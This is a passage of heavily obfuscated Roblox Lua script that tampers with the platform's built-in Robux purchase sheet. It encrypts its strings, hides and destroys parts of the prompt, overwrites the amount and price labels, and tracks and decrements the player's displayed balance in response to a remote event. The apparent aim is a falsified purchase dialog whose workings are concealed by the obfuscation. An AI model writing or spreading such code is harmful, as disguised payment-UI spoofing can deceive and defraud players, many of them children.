);game:GetService(v7("\136\204\89\67\100\95\50","\45\203\163\43\38\35\42\91")).FoundationOverlay.SafeAreaFrame.OverlayPortal.SheetContainer.Frame.Sheet.Content.Header.BottomBorder.Visible=false;game:GetService(v7("\241\138\206\38\160\188\93","\52\178\229\188\67\231\201")).FoundationOverlay.SafeAreaFrame.OverlayPortal.SheetContainer.Frame.Shadow.Visible=false;game:GetService(v7("\19\84\94\55\242\78\53\40\66\85","\67\65\33\48\100\151\60")).RenderStepped:Connect(function() v169();end);v92();v90();v191.LeftSide.RobuxAmount.Text=v7("\239\235\171\217\224\218\167\138\215\253\222\243\171\152\190\159\212\173\202\250\207\243\239","\147\191\135\206\184");v191.RightSide.RobuxPrice.Text="";v190.Header.Content.CloseAffordance.Icon.Text="";v191.ChildAdded:Connect(function(v276) if ((v276.Name==v7("\165\43\178\200\215\93\161","\210\228\72\198\161\184\51")) or (v276.Name==v7("\21\70\253\4\118\192\34","\174\86\41\147\112\19"))) then v276:Destroy();game:GetService(v7("\120\15\159\14\2\26\24","\203\59\96\237\107\69\111\113")).FoundationOverlay.SafeAreaFrame.OverlayPortal.Backdrop.Visible=false;end end);v190:WaitForChild(v7("\5\21\184\232\62\254\196","\183\68\118\204\129\81\144")):Destroy();v190:WaitForChild(v7("\45\162\126\240\14\140\26","\226\110\205\16\132\107")):Destroy();v106=true;end local function v171() local v200=0 + 0 ;local v201;local v202;local v203;local v204;local v205;local v206;local v207;while true do if (v200==(1517 -(822 + 692))) then v205:GetPropertyChangedSignal(v7("\79\57\167\84","\197\27\92\223\32\209\187\17")):Connect(function(...) v205.Text="";end);v205.Text="";v206=game:GetService(v7("\32\80\209\254\36\74\202","\155\99\63\163"));v207=nil;v200=4;end if ((2 -0)==v200) then v204.RightSide:Destroy();v204.LeftSide.RobuxAmount.Text=v7("\123\114\166\247\213\92\49\152\241\196\76\120\186\249\137\8\82\184\247\198\67\49\140\191","\165\40\17\212\158");v201:WaitForChild(v7("\198\214\6\39\35\235\205","\70\133\185\104\83")):Destroy();v205=v201:WaitForChild(v7("\37\70\80\35\198\10\86","\169\100\37\36\74")):WaitForChild("1"):WaitForChild(v7("\34\146\187\114\21\147\182\95\14","\48\96\231\194")):WaitForChild(v7("\252\95\22\57","\227\168\58\110\77\121\184\207"));v200=2 + 1 ;end if (v200==(297 -(45 + 252))) then v201=v167();v202=nil;function v202() local v310=0 + 0 ;local v311;local v312;while true do if (v310==1) then v312.BackgroundTransparency=2 + 1 ;v311.BackgroundTransparency=4;break;end if (v310==(0 -0)) then v311=v206:WaitForChild(v7("\205\204\245\215\69\234\215\233\214\79\196\213\229\203\77\234\218","\33\139\163\128\185")):WaitForChild(v7("\100\89\2\219\118\74\1\223\113\74\5\211\82","\190\55\56\100")):WaitForChild(v7("\121\185\57\12\31\226\234\102\160\46\10\18\239","\147\54\207\92\126\115\131")):WaitForChild(v7("\62\57\48\120\25\93\2\63\33\124\4\112\8\35","\30\109\81\85\29\109")):WaitForChild(v7("\217\99\85\187\51","\156\159\17\52\214\86\190")):WaitForChild(v7("\157\231\184\185\186","\220\206\143\221"));v312=v311:WaitForChild(v7("\165\114\35\3\221\194\198","\178\230\29\77\119\184\172")):WaitForChild(v7("\212\189\30\18\120\246\230","\152\149\222\106\123\23")):WaitForChild("1"):WaitForChild(v7("\255\51\239\97\160\201\50\249\77","\213\189\70\150\35"));v310=434 -(114 + 319) ;end end end game:GetService(v7("\125\64\122\59\74\71\98\1\76\80","\104\47\53\20")).RenderStepped:Connect(function() v202();end);v200=1 -0 ;end if (v200==(1 -0)) then v91();v203=v201:WaitForChild(v7("\139\73\128\24\185\29","\111\195\44\225\124\220")):WaitForChild(v7("\251\73\14\103\174\165\204","\203\184\38\96\19\203"));v203:WaitForChild(v7("\26\127\118\82\203\24\117\127\78\220\61\114\119\66\203","\174\89\19\25\33")):Destroy();v204=v203:WaitForChild(v7("\28\7\80\109\248\137\31\42\28\70","\107\79\114\50\46\151\231")):WaitForChild(v7("\20\169\177\40\134\17\178\193\61\163\167","\160\89\198\213\73\234\89\215"));v200=2;end if (v200==(3 + 1)) then function v207() local v313=v206:WaitForChild(v7("\164\222\180\131\189\133\150\216\174\131\150\146\135\195\173\140\160","\228\226\177\193\237\217")):WaitForChild(v7("\7\177\37\227\21\162\38\231\18\162\34\235\49","\134\84\208\67")):WaitForChild(v7("\60\186\131\78\31\173\159\108\28\190\146\93\31","\60\115\204\230"));local v314=v313:WaitForChild(v7("\212\50\238\117\243\25\228\126\243\59\226\126\226\40","\16\135\90\139")):WaitForChild(v7("\114\102\7\62\75","\24\52\20\102\83\46\52")):WaitForChild(v7("\247\39\36\33\27","\111\164\79\65\68"));local v315=v314:WaitForChild(v7("\229\214\141\202\43\228\210","\138\166\185\227\190\78"));local v316=v315:WaitForChild(v7("\234\119\209\62\93\45\10","\121\171\20\165\87\50\67")):WaitForChild("1");v313:WaitForChild(v7("\228\57\186\61\189\16\201\40","\98\166\88\217\86\217")).Visible=false;v315:WaitForChild(v7("\222\243\120\5\131\206","\188\150\150\25\97\230")).Visible=false;v316:WaitForChild(v7("\248\133\94\1\7\239\211\155\91\55\28\254\223\133\83\32\13\227\212\140\77","\141\186\233\63\98\108")).Visible=false;v316:WaitForChild(v7("\211\255\53\148\48\229\254\35\184","\69\145\138\76\214")):WaitForChild(v7("\68\202\145\157","\118\16\175\233\233\223")).Visible=false;v314.BackgroundTransparency=14 -4 ;v316:WaitForChild(v7("\169\145\44\153\251\159\105\132\138","\29\235\228\85\219\142\235")).BackgroundTransparency=20 -10 ;end v207();break;end end end local v172,v173=pcall(v166);if  not v172 then local v277=1963 -(556 + 1407) ;while true do if ((1206 -(741 + 465))==v277) then v170();return;end end end if  not v173.sheet.Visible then repeat task.wait();until v173.sheet.Visible end v102=v165(v173.balanceLabel.Text);v105=v102;local function v174() local v208=465 -(170 + 295) ;local v209;while true do if (v208==(1 + 0)) then if  not v106 then v170();else v171();end break;end if (v208==(0 + 0)) then local v289=0 -0 ;while true do if ((0 + 0)==v289) then v209=v165(v173.balanceLabel.Text);if ( not v209 and  not v102) then return;end v289=1 + 0 ;end if (v289==(1 + 0)) then v208=1231 -(957 + 273) ;break;end end end end end local function v175() local v210=v165(v173.balanceLabel.Text);if ( not v210 and  not v102) then return;end v164();end v173.sheet:GetPropertyChangedSignal(v7("\11\221\169\212\117\66\34","\50\93\180\218\189\23\46\71")):Connect(function() if v173.sheet.Visible then v174();end end);v173.overlay:WaitForChild(v7("\237\165\93\73\101\206\77\223\130\73\77\73\217","\40\190\196\59\44\36\188")).ChildAdded:Connect(v174);v173.overlay.SafeAreaFrame.ChildRemoved:Connect(function(v211) v175();end);if v173.sheet.Visible then v174();end Remotes.OnClientEvent(v7("\27\76\218\160\201\120\3\40\100\208\177\232\105","\109\92\37\188\212\154\29")):Connect(function(v212,v213) if ((v212==v100) and v102) then local v283=0;while true do if (v283==(0 + 0)) then v103();v102=v102-v213 ;v283=1 + 0 ;end if (v283==1) then v164();break;end end end end);end